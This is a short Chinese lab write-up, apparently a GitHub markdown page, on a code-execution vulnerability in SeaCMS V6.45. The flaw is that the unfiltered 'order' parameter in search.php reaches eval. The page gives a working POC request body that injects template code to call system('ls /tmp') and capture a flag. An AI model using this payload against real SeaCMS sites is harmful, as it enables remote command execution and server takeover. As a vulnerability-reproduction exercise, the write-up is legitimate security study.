Skip to content

Latest commit

 

History

History
23 lines (13 loc) · 548 Bytes

海洋cms_V6.45版本代码执行.md

File metadata and controls

23 lines (13 loc) · 548 Bytes

海洋 cms V6.45版本代码执行 by Frivolous-scholar

概述

该漏洞成因在于 search.php 没有对用户输入内容进行过滤,导致攻击者提交的 order 参数可进入 parseIf 函数中执行 eval。

复现

1、首先打开靶场。

1

2、输入任意内容搜索并抓包。

2

3、利用 POC 拿到 Flag

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=ls /tmp

3